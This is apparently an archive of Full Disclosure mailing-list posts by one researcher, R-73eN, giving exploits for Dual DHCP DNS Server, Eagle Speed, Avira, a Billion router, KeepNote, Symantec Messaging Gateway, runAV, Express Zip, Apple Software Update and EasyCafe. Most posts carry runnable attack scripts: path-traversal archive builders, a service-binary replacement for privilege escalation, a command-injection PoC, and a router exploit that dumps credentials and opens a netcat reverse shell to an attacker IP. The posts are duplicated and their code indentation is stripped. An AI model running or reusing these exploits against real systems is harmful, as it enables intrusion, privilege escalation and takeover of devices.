[FD] Dual DHCP DNS Server 7.29 Buffer Overflow (Dos)

[Rio Sherri]

# Date : 07/12/2016
# Author : R-73eN
# Tested on: Dual DHCP DNS Server 7.29 on Windows 7 SP1 (32bit)
# Vendor : http://dhcp-dns-server.sourceforge.net/
# Software :
https://sourceforge.net/projects/dhcp-dns-server/files/Dual%20DHCP%20DNS%20Server/DualServerInstallerV7.29.exe/download
# Vulnerability Description:
# The software crashes when it tries to write to an invalid address.
#
# MOV EBX,DWORD PTR SS:[EBP+8] -> EBP+8 is part of our controlled input
# MOV DWORD PTR SS:[ESP+4],31
# MOV DWORD PTR SS:[ESP],1
# .
# MOV DWORD PTR DS:[EBX+24],EAX -> Here happens the corruption, EAX fails
to move EBX which is our controlled adress + 24 bytes.
#
# I think this vulnerability is not exploitable because every module that
is loaded has ASLR/DEP/SAFESEH enabled (Win 7)
# Even if we try to put some valid pointers to manipulate the execution
flow we can't because every address on the DualServ.exe
# contains 00 which is a badchar in our case.
#
# Title :  Dual DHCP DNS Server 7.29 Buffer Overflow (Dos)
# Date : 07/12/2016
# Author : R-73eN
# Tested on: Dual DHCP DNS Server 7.29 on Windows 7 SP1 (32bit)
# Vendor : http://dhcp-dns-server.sourceforge.net/
# Software : https://sourceforge.net/projects/dhcp-dns-server/files/Dual%20DHCP%20DNS%20Server/DualServerInstallerV7.29.exe/download
# Vulnerability Description:
# The software crashes when it tries to write to an invalid address.
#
# MOV EBX,DWORD PTR SS:[EBP+8] -> EBP+8 is part of our controlled input
# MOV DWORD PTR SS:[ESP+4],31  
# MOV DWORD PTR SS:[ESP],1 
# .
# MOV DWORD PTR DS:[EBX+24],EAX -> Here happens the corruption, EAX fails to move EBX which is our controlled adress + 24 bytes.
#
# I think this vulnerability is not exploitable because every module that is loaded has ASLR/DEP/SAFESEH enabled (Win 7)
# Even if we try to put some valid pointers to manipulate the execution flow we can't because every address on the DualServ.exe 
# contains 00 which is a badchar in our case.
#

import socket
import time
import sys

banner = "\n\n"
banner +="  _____ __  \n" 
banner +=" |_ _|_ __  / _| ___  / ___| ___ _ __  / \  | |\n"
banner +="  | || '_ \| |_ / _ \| |  _ / _ \ '_ \/ _ \ | |\n"
banner +="  | || | | |  _| (_) | |_| |  __/ | | |  / ___ \| |___ \n"
banner +=" |___|_| |_|_|  \___/ \|\___|_| |_| /_/   \_\_|\n\n"
print banner

host = ""
port = 6789

def send_request(host,port,data):
	s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	try:
		s.connect((host,port))
		s.send(data)
		print "[+] Malicious Packet Sent [+]\n"
		
	except Exception:
		print "[+] Exploit failed . . .[+]\n"
	s.close()

	

ebx = ""
eax = ""
evil = "A" * 497 + eax + "" + ebx + "D" * 400

if(len(sys.argv) < 1):
print '\n Usage : exploit.py ipaddress\n'
exit(0)
else:
host = sys.argv[1]

#The method doesn't really matters. It gets valideted only about the length
request = "HEAD /{REPLACE} HTTP/1.1\r\nHost: " + str(host) + "\r\nUser-agent: Fuzzer\r\n\r\n"
send_request(host,port,request.replace("{REPLACE}",evil))


___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] Eagle Speed USB MODEM SOFTWARE Privilege Escalation

[Rio Sherri]

# Vulnerability Description:
# When the Eagle Speed software is installed a service with name ZDServ is
installed.
# The service itself has the right permissions which do not allow to
reconfigure the binary
# but the path the binary is writable by any authenticated user.
#
# C:\Users\lowpriv>sc qc zdserv
# [SC] QueryServiceConfig SUCCESS
#
# SERVICE_NAME: zdserv
#TYPE   : 110  WIN32_OWN_PROCESS (interactive)
#START_TYPE : 2   AUTO_START
#ERROR_CONTROL  : 1   NORMAL
#BINARY_PATH_NAME   : "C:\ProgramData\ZDSupport\ZDServ\ZDServ.exe"
#LOAD_ORDER_GROUP   :
#TAG: 0
#DISPLAY_NAME   : ZDServ
#DEPENDENCIES   :
#SERVICE_START_NAME : LocalSystem
#
#
#
# C:\Users\lowpriv>icacls "C:\ProgramData\ZDSupport\ZDServ\ZDServ.exe"
# C:\ProgramData\ZDSupport\ZDServ\ZDServ.exe Everyone:(I)(F) <---
Everyone has full permissions.
#   NT AUTHORITY\SYSTEM:(I)(F)
#   BUILTIN\Administrators:(I)(F)
#  Victim-PC\lowpriv:(I)(F)
#   BUILTIN\Users:(I)(RX)
#
# Successfully processed 1 files; Failed processing 0 files
#
# This exploit takes as a parameter an exe file that will replace the
ZDServ.exe and will run
# with full privileges when the service/computer is restarted.
#
# Video : https://youtu.be/o59SD8gXzlU
#
Exploit is attached.
#!/usr/bin/python -w
# Title : Eagle Speed USB MODEM SOFTWARE Privilege Escalation
# Date : 28/11/2016
# Author : R-73eN 
# Tested on : Windows 7 ( Latest version of the software)
# Software : N/A ( Comes with the USB Modem)
# Vulnerability Description:
# When the Eagle Speed software is installed a service with name ZDServ is installed.
# The service itself has the right permissions which do not allow to reconfigure the binary
# but the path the binary is writable by any authenticated user.
#
# C:\Users\lowpriv>sc qc zdserv
# [SC] QueryServiceConfig SUCCESS
#
# SERVICE_NAME: zdserv
#TYPE   : 110  WIN32_OWN_PROCESS (interactive)
#START_TYPE : 2   AUTO_START
#ERROR_CONTROL  : 1   NORMAL
#BINARY_PATH_NAME   : "C:\ProgramData\ZDSupport\ZDServ\ZDServ.exe"
#LOAD_ORDER_GROUP   :
#TAG: 0
#DISPLAY_NAME   : ZDServ
#DEPENDENCIES   :
#SERVICE_START_NAME : LocalSystem
#
#
#
# C:\Users\lowpriv>icacls "C:\ProgramData\ZDSupport\ZDServ\ZDServ.exe"
# C:\ProgramData\ZDSupport\ZDServ\ZDServ.exe Everyone:(I)(F) <--- Everyone has full permissions.
#   NT AUTHORITY\SYSTEM:(I)(F)
#   BUILTIN\Administrators:(I)(F)
#  Victim-PC\lowpriv:(I)(F)
#   BUILTIN\Users:(I)(RX)
#
# Successfully processed 1 files; Failed processing 0 files
#
# This exploit takes as a parameter an exe file that will replace the ZDServ.exe and will run
# with full privileges when the service/computer is restarted.
#
# Video : https://youtu.be/o59SD8gXzlU
#

import os
import sys
import filecmp
path = "C:\ProgramData\ZDSupport\ZDServ\ZDServ.exe"
file_move = 'move "C:\ProgramData\ZDSupport\ZDServ\ZDServ.exe" "C:\ProgramData\ZDSupport\ZDServ\ZDServ.exe.bak"'
banner = "\n\n"
banner +="  _____ __  \n" 
banner +=" |_ _|_ __  / _| ___  / ___| ___ _ __  / \  | |\n"
banner +="  | || '_ \| |_ / _ \| |  _ / _ \ '_ \/ _ \ | |\n"
banner +="  | || | | |  _| (_) | |_| |  __/ | | |  / ___ \| |___ \n"
banner +=" |___|_| |_|_|  \___/ \|\___|_| |_| /_/   \_\_|\n\n"
print banner


if(len(sys.argv) < 2):
print '\n Usage : exploit.py program.exe\n'
print 'https://infogen.al/'
else: 
program = sys.argv[1]
if(not os.path.isfile(program)):
print "[-] The parameter was incorrect, use a correct filename [-]"
exit(0)
if(not os.path.isfile(path)):
print "[-] File not found , propably service doesn't exists [-]\n"
else:
print "[+] Backing up the binary [+]"
os.system(file_move)
print "[+] Copying the payload [+]"
os.system("copy " + program + " " + path)
if(filecmp.cmp(program,path)):
print "[+] Exploit successfull, wait for service to restart or reboot [+]"
else:
print "[-] Exploit failed [-]"


___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] Avira Antivirus >= 15.0.21.86 Command Execution (SYSTEM)

[Rio Sherri]

# Title :  Avira Antivirus >= 15.0.21.86 Command Execution (SYSTEM)
# Date : 08/11/2016
# Author : R-73eN
# Tested on: Avira Antivirus 15.0.21.86 in Windows 7
# Vendor : https://www.avira.com/
# Disclosure Timeline:
# 2016-06-28 - Reported to Vendor through Bugcrowd.
# 2016-06-29 - Vendor Replied.
# 2016-07-05 - Vendor Replicated the vulnerability.
# 2016-09-02 - Vendor released updated version which fix the vulnerability.
# 2016-11-08 - Public Disclosure
# I would like to thank Avira security team for the quick response.
#
# Vulnerability Description:
# When the Avira Launcher manual update imports a zip file doesn't checks
for " ../ "
# characters which makes it possible to do a path traversal and write
anywhere in the system.
# Vulnerability Replication
# 1. Create a special crafted zip file with the python script attached.
# 2. The script will create a zip file named xvdf_fusebundle.zip with a
filename test.bat (this can be changed) and will write this file to the
root directory C:\
# 3. You can change the directory go to startup and when the user reboots
the script will get executed or you can write a malicious dll to a program
directory or
#system32 directory which will get loaded and we gain remote command
execution.
# 4. Open avira free antivirus
# 5. Go to update -> Manual Update
# 6. Select the malicious file
# 7. Directory traversal was sucessfull
# Youtube Video: https://www.youtube.com/watch?v=IIEgWiDcw2Q
# Title :  Avira Antivirus >= 15.0.21.86 Command Execution (SYSTEM)
# Date : 08/11/2016
# Author : R-73eN
# Tested on: Avira Antivirus 15.0.21.86 in Windows 7
# Vendor : https://www.avira.com/
# Disclosure Timeline:
# 2016-06-28 - Reported to Vendor through Bugcrowd.
# 2016-06-29 - Vendor Replied.
# 2016-07-05 - Vendor Replicated the vulnerability.
# 2016-09-02 - Vendor released updated version which fix the vulnerability.
# 2016-11-08 - Public Disclosure
# I would like to thank Avira security team for the quick response. 
#
# Vulnerability Description:
# When the Avira Launcher manual update imports a zip file doesn't checks for " 
../ " 
# characters which makes it possible to do a path traversal and write anywhere 
in the system.
# Vulnerability Replication
# 1. Create a special crafted zip file with the python script attached. 
# 2. The script will create a zip file named xvdf_fusebundle.zip with a 
filename test.bat (this can be changed) and will write this file to the root 
directory C:\ 
# 3. You can change the directory go to startup and when the user reboots the 
script will get executed or you can write a malicious dll to a program 
directory or 
#system32 directory which will get loaded and we gain remote command 
execution. 
# 4. Open avira free antivirus 
# 5. Go to update -> Manual Update 
# 6. Select the malicious file 
# 7. Directory traversal was sucessfull
# Youtube Video: https://www.youtube.com/watch?v=IIEgWiDcw2Q
# POC: 

#!/usr/bin/python -w
banner = ""
banner += "  _____ __  \n" 
banner +=" |_ _|_ __  / _| ___  / ___| ___ _ __  / \  | |\n"
banner +="  | || '_ \| |_ / _ \| |  _ / _ \ '_ \/ _ \ | |\n"
banner +="  | || | | |  _| (_) | |_| |  __/ | | |  / ___ \| |___ \n"
banner +=" |___|_| |_|_|  \___/ \|\___|_| |_| /_/   \_\_|\n\n"
print banner

import zipfile, sys


if(len(sys.argv) != 2):
print "[+] Usage : python exploit.py file_to_do_the_traversal [+]"
print "[+] Example: python exploit.py test.txt"
exit(0)
print "[+] Creating Zip File [+]"
zf = zipfile.ZipFile("xvdf_fusebundle.zip", "w")
zf.write(sys.argv[1], "..\\..\\..\\..\\..\\..\\..\\..\\test.bat")
zf.close()
print "[+] Created xvdf_fusebundle.zip successfully [+]"

# Fix:
# Update to the latest version.
___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] Billion Router 7700NR4 Remote Root Command Execution

[Rio Sherri]

# Title : Billion Router 7700NR4 Remote Root Command Execution
# Date : 06/10/2016
# Author : R-73eN
# Tested on: Billion Router 7700NR4
# Vendor : http://www.billion.com/
# Vulnerability Description:
# This router is a widely used here in Albania. It is given by a telecom
provider to the home and bussiness users.
# The problem is that this router has hardcoded credentials which "can not
be changed" by a normal user. Using these
# credentials we don't have to much access but the lack of authentication
security we can download the backup and get the admin password.
# Using that password we can login to telnet server and use a shell escape
to get a reverse root connection.
# You must change host with the target and reverse_ip with your attacking
ip.
# Fix:
# The only fix is hacking your router with this exploit, changing the
credentials and disabling all the other services using iptables.
# Exploit attached.

# Title : Billion Router 7700NR4 Remote Root Command Execution
# Date : 06/10/2016
# Author : R-73eN
# Tested on: Billion Router 7700NR4 
# Vendor : http://www.billion.com/
# Vulnerability Description:
# This router is a widely used here in Albania. It is given by a telecom provider to the home and bussiness users.
# The problem is that this router has hardcoded credentials which "can not be changed" by a normal user. Using these 
# credentials we don't have to much access but the lack of authentication security we can download the backup and get the admin password.
# Using that password we can login to telnet server and use a shell escape to get a reverse root connection.
# You must change host with the target and reverse_ip with your attacking ip.
# Fix:
# The only fix is hacking your router with this exploit, changing the credentials and disabling all the other services using iptables. 
#

import requests
import base64
import socket
import time

host = ""
def_user = "user"
def_pass = "user"
reverse_ip = ""
#Banner
banner = ""
banner +="  _____ __  \n"
banner +=" |_ _|_ __  / _| ___  / ___| ___ _ __  / \  | |\n"
banner +="  | || '_ \| |_ / _ \| |  _ / _ \ '_ \/ _ \ | |\n"
banner +="  | || | | |  _| (_) | |_| |  __/ | | |  / ___ \| |___ \n"
banner +=" |___|_| |_|_|  \___/ \|\___|_| |_| /_/   \_\_|\n\n"
print banner


# limited shell escape
evil = 'ping ;rm /tmp/backpipe;cd tmp;echo "mknod backpipe p && nc ' + reverse_ip  + ' 1337 0backpipe &" > /tmp/rev.sh;chmod +x rev.sh;sh /tmp/rev.sh &'

def execute_payload(password):
	print "[+] Please run nc -lvp 1337 and then press any key [+]"
	raw_input()
	s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	s.connect((host,23))
	s.recv(1024)
	s.send("admin\r")
	a= s.recv(1024)
	time.sleep(1)
	s.send(password +"\r")
	time.sleep(1)
	s.recv(1024)
	s.send(evil + "\r")
	time.sleep(1)
	print "[+] If everything worked you should get a reverse shell [+]"
	print "[+] Warning pressing any key will close the SHELL [+]"
	raw_input()




r = requests.get("http://"; + host + "/backupsettings.conf" , auth=(def_user,def_pass))
if(r.status_code == 200):
	print "[+] Seems the exploit worked [+]"
	print "[+] Dumping data . . . [+]"
	temp = r.text
	admin_pass = temp.split("")[1].split("")[0]
#	print "[+] Admin password : " + str(base64.b64decode(admin_pass)) + " [+]"
	execute_payload(str(base64.b64decode(admin_pass)))
else:
	print "[-] Exploit Failed [-]"
print "\n[+] https://www.infogen.al/ [+]\n\n"

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] KeepNote 0.7.8 Remote Command Execution

[Rio Sherri]

# Title : KeepNote 0.7.8 Remote Command Execution
# Date : 29/09/2016
# Author : R-73eN
# Twitter : https://twitter.com/r_73en
# Tested on : KeepNote 0.7.8 (Kali Linux , and Windows 7)
# Software : http://keepnote.org/index.shtml#download
# Vendor : ~
#
# DESCRIPTION:
#
# When the KeepNote imports a backup which is actuallt a tar.gz file
doesn't checks for " ../ " characters
# which makes it possible to do a path traversal and write anywhere in the
system(where the user has writing permissions).
# This simple POC will write to the /home/root/.bashrc the file test.txt to
get command execution when the bash is run.
# There are a lot of ways but i choose this just for demostration purposes
and its supposed we run the keepnote application
# as root (default in kali linux which this bug is tested).
#
#
# Title : KeepNote 0.7.8 Remote Command Execution
# Date : 29/09/2016
# Author : R-73eN
# Twitter : https://twitter.com/r_73en 
# Tested on : KeepNote 0.7.8 (Kali Linux , and Windows 7)
# Software : http://keepnote.org/index.shtml#download
# Vendor : ~ 
#
# DESCRIPTION:
#
# When the KeepNote imports a backup which is actuallt a tar.gz file doesn't checks for " ../ " characters 
# which makes it possible to do a path traversal and write anywhere in the system(where the user has writing permissions).
# This simple POC will write to the /home/root/.bashrc the file test.txt to get command execution when the bash is run.
# There are a lot of ways but i choose this just for demostration purposes and its supposed we run the keepnote application
# as root (default in kali linux which this bug is tested).
#
#


banner = ""
banner +="  _____ __  \n" 
banner +=" |_ _|_ __  / _| ___  / ___| ___ _ __  / \  | |\n"
banner +="  | || '_ \| |_ / _ \| |  _ / _ \ '_ \/ _ \ | |\n"
banner +="  | || | | |  _| (_) | |_| |  __/ | | |  / ___ \| |___ \n"
banner +=" |___|_| |_|_|  \___/ \|\___|_| |_| /_/   \_\_|\n\n"
print banner

import tarfile, sys

if(len(sys.argv) != 2):
print "[+] Usage : python exploit.py file_to_do_the_traversal [+]"
print "[+] Example: python exploit.py test.txt" 
exit(0)
print "[+] Creating Exploit File [+]"

filename = "KeepNoteBackup.tar.gz"

path = "../../../../../../../home/root/.bashrc"

tf = tarfile.open(filename,"w:gz")
tf.add(sys.argv[1], path)
tf.close()

print "[+] Created KeepNoteBackup.tar.gz successfully [+]"


___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] Symantec Messaging Gateway <= 10.6.1 Directory Traversal

[Rio Sherri]

# Title : Symantec Messaging Gateway <= 10.6.1 Directory Traversal
# Date : 28/09/2016
# Author : R-73eN
# Tested on : Symantec Messaging Gateway 10.6.1 (Latest)
# Software :
https://www.symantec.com/products/threat-protection/messaging-gateway
# Vendor : Symantec
# CVE : CVE-2016-5312
# DESCRIPTION:
# A charting component in the Symantec Messaging Gateway control center
does not properly sanitize user input submitted for charting requests.
# This could potentially result in an authorized but less privileged user
gaining access to paths outside the authorized directory.
# This could potentially provide read access to some files/directories on
the server for which the user is not authorized.
# Title : Symantec Messaging Gateway <= 10.6.1 Directory Traversal
# Date : 28/09/2016
# Author : R-73eN
# Tested on : Symantec Messaging Gateway 10.6.1 (Latest)
# Software : 
https://www.symantec.com/products/threat-protection/messaging-gateway
# Vendor : Symantec
# CVE : CVE-2016-5312
# Vendor Advisory and Fix: 
https://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=&suid=20160927_00
# 
#  _____ __  
# |_ _|_ __  / _| ___  / ___| ___ _ __  / \  | |
#  | || '_ \| |_ / _ \| |  _ / _ \ '_ \/ _ \ | |
#  | || | | |  _| (_) | |_| |  __/ | | |  / ___ \| |___ 
# |___|_| |_|_|  \___/ \|\___|_| |_| /_/   \_\_|
#
#
# DESCRIPTION:
#
# A charting component in the Symantec Messaging Gateway control center does 
not properly sanitize user input submitted for charting requests. 
# This could potentially result in an authorized but less privileged user 
gaining access to paths outside the authorized directory. 
# This could potentially provide read access to some files/directories on the 
server for which the user is not authorized.
#
The problem relies in the package kavachart-kcServlet-5.3.2.jar , File : 
com/ve/kavachart/servlet/ChartStream.java
The vulnerable code is
extends HttpServlet {
public void doGet(HttpServletRequest httpServletRequest, 
HttpServletResponse httpServletResponse) {
block6 : {
try {
String string = httpServletRequest.getParameter("sn"); 
// Taking parameter "sn" and writing it to the "string 
variable"


if (string == null) break block6;
String string2 = string.substring(string.length() - 3);
 
byte[] arrby = 
(byte[])this.getServletContext().getAttribute(string); 
   
// The string variable is passed here without any 
sanitanization for directory traversal
// and you can successfully use this to do a directory 
traversal.

if (arrby != null) {
httpServletResponse.setContentType("image/" + string2);
ServletOutputStream servletOutputStream = 
httpServletResponse.getOutputStream();
httpServletResponse.setContentLength(arrby.length);
servletOutputStream.write(arrby);
this.getServletContext().removeAttribute(string);
break block6;
}


POC: 
https://IP-address:PORT/brightmail/servlet/com.ve.kavachart.servlet.ChartStream?sn=../../WEB-INF/lib


___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] Unrar 0.0.1 Memory Corruption

[Rio Sherri]

# Title : Unrar 0.0.1 Memory Corruption
# Date : 05/09/2016
# Author : R-73eN
# Tested on : Linux VM 2.6.38-8-generic #42-Ubuntu SMP Mon Apr 11 03:31:50
UTC 2011 i686 i686 i386 GNU/Linux
# Software : https://github.com/defiant-labs/unrar-free

root@VM:~/unrar-free/src# unrar --version
unrar 0.0.1
root@VM:~/unrar-free/src# gdb --args ./unrar ~/test.rar
GNU gdb (Ubuntu/Linaro 7.2-1ubuntu11) 7.2
Copyright (C) 2010 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later 
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "i686-linux-gnu".
For bug reporting instructions, please see:
...
Reading symbols from /root/unrar-free/src/unrar...done.
(gdb) run
Starting program: /root/unrar-free/src/unrar /root/test.rar

unrar 0.0.1  Copyright (C) 2004  Ben Asselstine, Jeroen Dekkers


Extracting from /root/test.rar


Program received signal SIGSEGV, Segmentation fault.
0x08050e2e in DecodeNumber (Deco=0x8066c20) at unrarlib.c:1653
1653  if (N < Deco->DecodeLen[8])


The document that crashes the unrar is attached.
# Title : Unrar 0.0.1 Memory Corruption
# Date : 05/09/2016
# Author : R-73eN
# Tested on : Linux VM 2.6.38-8-generic #42-Ubuntu SMP Mon Apr 11 03:31:50 UTC 
2011 i686 i686 i386 GNU/Linux
# Software : https://github.com/defiant-labs/unrar-free
#
#  _____ __  
# |_ _|_ __  / _| ___  / ___| ___ _ __  / \  | |
#  | || '_ \| |_ / _ \| |  _ / _ \ '_ \/ _ \ | |
#  | || | | |  _| (_) | |_| |  __/ | | |  / ___ \| |___ 
# |___|_| |_|_|  \___/ \|\___|_| |_| /_/   \_\_|
#
#
root@VM:~/unrar-free/src# unrar --version
unrar 0.0.1
root@VM:~/unrar-free/src# gdb --args ./unrar ~/test.rar 
GNU gdb (Ubuntu/Linaro 7.2-1ubuntu11) 7.2
Copyright (C) 2010 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later 
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "i686-linux-gnu".
For bug reporting instructions, please see:
...
Reading symbols from /root/unrar-free/src/unrar...done.
(gdb) run
Starting program: /root/unrar-free/src/unrar /root/test.rar

unrar 0.0.1  Copyright (C) 2004  Ben Asselstine, Jeroen Dekkers


Extracting from /root/test.rar


Program received signal SIGSEGV, Segmentation fault.
0x08050e2e in DecodeNumber (Deco=0x8066c20) at unrarlib.c:1653
1653  if (N < Deco->DecodeLen[8])


The document that crashes the unrar is attached.


crash.rar
Description: application/rar

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] runAV mod_security Remote Command Execution

[Rio Sherri]

# Title : runAV mod_security Remote Command Execution
# Date : 13/05/2016
# Author : R-73eN
# Tested on : mod_security with runAV Linux 4.2.0-30-generic #36-Ubuntu SMP
Fri Feb 26 00:57:19 UTC 2016 i686 i686 i686 GNU/Linux
# Software :
https://github.com/SpiderLabs/owasp-modsecurity-crs/tree/master/util/av-scanning/runAV
# Vendor : https://www.modsecurity.org/
# https://www.infogen.al/
# Title : runAV mod_security Remote Command Execution
# Date : 13/05/2016
# Author : R-73eN
# Tested on : mod_security with runAV Linux 4.2.0-30-generic #36-Ubuntu SMP Fri 
Feb 26 00:57:19 UTC 2016 i686 i686 i686 GNU/Linux
# Software : 
https://github.com/SpiderLabs/owasp-modsecurity-crs/tree/master/util/av-scanning/runAV
# Vendor : https://www.modsecurity.org/
#  _____ __  
# |_ _|_ __  / _| ___  / ___| ___ _ __  / \  | |
#  | || '_ \| |_ / _ \| |  _ / _ \ '_ \/ _ \ | |
#  | || | | |  _| (_) | |_| |  __/ | | |  / ___ \| |___ 
# |___|_| |_|_|  \___/ \|\___|_| |_| /_/   \_\_|
#
#



#include "common.h"

main(int argc, char *argv[])
{
char cmd[MAX_OUTPUT_SIZE];
char output[MAX_OUTPUT_SIZE];
int error;
char *colon;
char *keyword;

if (argc > 1) {
sprintf (cmd, "/usr/bin/clamscan --no-summary %s", argv[1]);
output[0] = '\0';
error = run_cmd(cmd,output,MAX_OUTPUT_SIZE);

+ OTHER CODE +


The argv[1] parameter is passed unsanitized to a sprintf function which sends 
the formatted output to the cmd variable,
which is later passed as a parameter to a run_cmd function on line 14.
https://github.com/SpiderLabs/owasp-modsecurity-crs/blob/master/util/av-scanning/runAV/runAV.c#L14

POC:

snort@snort-VirtualBox:/usr/share/modsecurity-crs/util/av-scanning/runAV$ 
./runAV "foo.php;touch /tmp/pwn3d"
sh: 1: /usr/bin/clamscan: not found
1 exec empty: OK
snort@snort-VirtualBox:/usr/share/modsecurity-crs/util/av-scanning/runAV$ ls 
-la /tmp/ | grep pwn3d
-rw-rw-r--  1 snort snort0 Maj 13 16:45 pwn3d
snort@snort-VirtualBox:/usr/share/modsecurity-crs/util/av-scanning/runAV$ 
___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] Express Zip <= 2.40 Path Traversal

[Rio Sherri]

#!/usr/bin/python -w
# Title : Express Zip <= 2.40 Path Traversal
# Date : 07/04/2016
# Author : R-73eN
# Tested on : Windows Xp / Windows 7 Ultimate
# Software Link : http://www.nchsoftware.com/zip/
# Download Link: http://www.nchsoftware.com/zip/zipplus.exe
# Vulnerable Versions : Express Zip <= 2.40
# Express Zip doesn't validates " ..\ " which makes possible
# to do a path traversal attack which can be converted easily to RCE
# How to Reproduce:
# 1- Run Exploit
# 2- Right Click evil.zip go to Express Zip and click Extract Here
# 3- File will be extracted to the root of the partition in this case
C:\POC.txt
# This quick and dirt code is written only for demonstration purposes.
# If you wanna profit from it you must modify it.
# Video: https://www.youtube.com/watch?v=kb43h8Hoo0o
#!/usr/bin/python -w
# Title : Express Zip <= 2.40 Path Traversal
# Date : 07/04/2016
# Author : R-73eN
# Tested on : Windows Xp / Windows 7 Ultimate
# Software Link : http://www.nchsoftware.com/zip/
# Download Link: http://www.nchsoftware.com/zip/zipplus.exe
# Vulnerable Versions : Express Zip <= 2.40
# Express Zip doesn't validates " ..\ " which makes possible
# to do a path traversal attack which can be converted easily to RCE
# How to Reproduce:
# 1- Run Exploit
# 2- Right Click evil.zip go to Express Zip and click Extract Here
# 3- File will be extracted to the root of the partition in this case C:\POC.txt
# This quick and dirt code is written only for demonstration purposes.
# If you wanna profit from it you must modify it.
# Video: https://www.youtube.com/watch?v=kb43h8Hoo0o
#

#Banner
banner = ""
banner += "  _____ __  \n" 
banner +=" |_ _|_ __  / _| ___  / ___| ___ _ __  / \  | |\n"
banner +="  | || '_ \| |_ / _ \| |  _ / _ \ '_ \/ _ \ | |\n"
banner +="  | || | | |  _| (_) | |_| |  __/ | | |  / ___ \| |___ \n"
banner +=" |___|_| |_|_|  \___/ \|\___|_| |_| /_/   \_\_|\n\n"
print banner

import zipfile, sys


if(len(sys.argv) != 2):
print "[+] Usage : python exploit.py file_to_do_the_traversal [+]"
print "[+] Example: python exploit.py test.txt"
exit(0)
print "[+] Creating Zip File [+]"
zf = zipfile.ZipFile("evil.zip", "w")
zf.write(sys.argv[1], "..\\..\\..\\..\\..\\..\\..\\..\\POC.txt")
zf.close()
print "[+] Created evil.zip successfully [+]"
___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] Apple Software Update 2.1.3 (Windows) Remote Command Execution.

[Rio Sherri]

Apple software update is an utility to update apple software on windows
machines. The update proccess uses this kind of architecture.
First the software makes a request to
http://swcatalog.apple.com/content/catalogs/others/index-windows-1.sucatalog
This returns a xml file containing url of ".dist" files, and there were
some more interesting things

key>Packages


URL

http://swcdn.apple.com/content/downloads/61/34/061-8153/WgWXrHyJVmFn9KrXRg3w2XPXNFXxhnZFS6/BootCampUpdate32.msp

.
.
.
.


MSP is a file extension for a Windows Installer patch file format used by
Windows and Microsoft programs,
typically for bug fixes, security updates and hotfixes. Since the program
connects with the host in plain
text http we can use a MITM attack and modify the response and the link to
a malicous .msp and we get a remote command execution.

There are even .exe files

.
.
.
URL
string>
http://swcdn.apple.com/content/downloads/21/23/061-4512/BKYTZyKmtNr5wpxQCTy9f8xDSYPZ5MTGf4/BCLocUpdateEnable.exe

.
.
.

Apart from this if we take a look at the .dist file the program uses XML
files. It has options for urls,arch, etc etc
An example:
http://swcdn.apple.com/content/downloads/42/17/031-43074/ts4e9jo3pe732xq8ghsq504uye3x1dt7az/031-43074.English.dist
Has the following content










BootCampUpdate32.msp

.
.
.
.
.

It has a "rtf" file content which is runned when the installation
begins.(Which can lead to exploitation of Word Bugs)
It has a html file content which is runned through IE Scripting
Engine(Which can lead to exploitation of Internet Explorer Bugs)

The other intersting thing is


AppleApplicationSupport.msi
QuickTime.msi
QuickTime.msi
QuickTimeInstallerAdmin.exe


Basically this are the commands that get executed throughout installation.
So modifying this response through a MITM, adding an argument as below
From:
QuickTime.msi
To:
QuickTime.msi

Our command executes.

Rio Sherri
Infogen AL

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] EasyCafe Server <= 2.2.14 Remote File Read

[Rio Sherri]

# Title : EasyCafe Server <= 2.2.14 Remote File Read
# Date : 25/12/2015
# Author : R-73eN
# Tested on : Windows 7 Ultimate
# Software Link : http://www.tinasoft.com/easycafe/
# Vulnerable Versions : EasyCafe Server <= 2.2.14
# EasyCafe Server has a feature to upload file from the server to a client.
# And the request is as following. EasyCafe Server sends an UDP request to
the client with the file that wants to upload,
# Then the client receives the packet and connects to the server on port
831 and sends the directory of the file and receives it.
# The problem is that a remote attacker can connect to port 831 and can
retrive a file because the server doesn't validate the request,
# and does not check if it has sent the UDP request which gives us full
Read access to the system.

POC is attached.
#!/usr/bin/python -w
# Title : EasyCafe Server <= 2.2.14 Remote File Read
# Date : 25/12/2015
# Author : R-73eN
# Tested on : Windows 7 Ultimate
# Software Link : http://www.tinasoft.com/easycafe/
# Vulnerable Versions : EasyCafe Server <= 2.2.14
# EasyCafe Server has a feature to upload file from the server to a client.
# And the request is as following. EasyCafe Server sends an UDP request to the 
client with the file that wants to upload,
# Then the client receives the packet and connects to the server on port 831 
and sends the directory of the file and receives it.
# The problem is that a remote attacker can connect to port 831 and can retrive 
a file because the server doesn't validate the request,
# and does not check if it has sent the UDP request which gives us full Read 
access to the system.
#

import socket
#Banner
banner = ""
